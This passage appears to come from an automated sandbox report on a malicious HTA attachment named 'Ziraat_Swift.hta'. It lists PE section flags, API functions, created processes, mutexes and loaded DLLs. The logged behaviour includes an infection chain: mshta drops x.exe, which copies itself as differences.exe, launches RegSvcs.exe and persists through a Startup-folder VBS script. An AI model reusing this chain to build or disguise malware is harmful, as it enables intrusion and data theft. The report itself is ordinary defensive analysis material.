                  Source: OneDriveSetup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Integrator.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroTextExtractor.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ADelRCP.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ADNotificationManager.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AdobeCollabSync.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: WCChromeNativeMessagingHost.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: CRLogTransport.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: CRWindowsClientService.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Eula.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: LogTransport2.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: adobe_licensing_wf_acro.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: adobe_licensing_wf_helper_acro.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 32BitMAPIBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 64BitMAPIBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MSRMSPIBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: FullTrustNotifier.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ShowAppPickerForPDF.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Acrobat.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: appvcleaner.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winHTA@28/149@27/12
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046A06A GetLastError,FormatMessageW,1_2_0046A06A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004581CB AdjustTokenPrivileges,CloseHandle,1_2_004581CB
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_004587E1
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,1_2_0046B333
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_0047EE0D
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,1_2_0046C397
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,1_2_00404E89
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A9CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,1_2_00A9CBD0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Roaming\31d53b0537b9f482.binJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-31d53b0537b9f482-inf
                  Source: C:\Windows\System32\alg.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-31d53b0537b9f4829ea72c54-b
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-31d53b0537b9f4827d8e3ee9-b
                  Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs"
                  Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Ziraat_Swift.htaVirustotal: Detection: 8%
                  Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Ziraat_Swift.hta"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\subpredicate\differences.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                  Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\subpredicate\differences.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess created: C:\Users\user\AppData\Local\subpredicate\differences.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
                  Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                  Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                  Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
                  Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                  Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
                  Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
                  Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
                  Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\subpredicate\differences.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\subpredicate\differences.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess created: C:\Users\user\AppData\Local\subpredicate\differences.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msxml3.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msdart.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: drprov.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ntlanman.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: davclnt.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: davhlpr.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: browcli.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
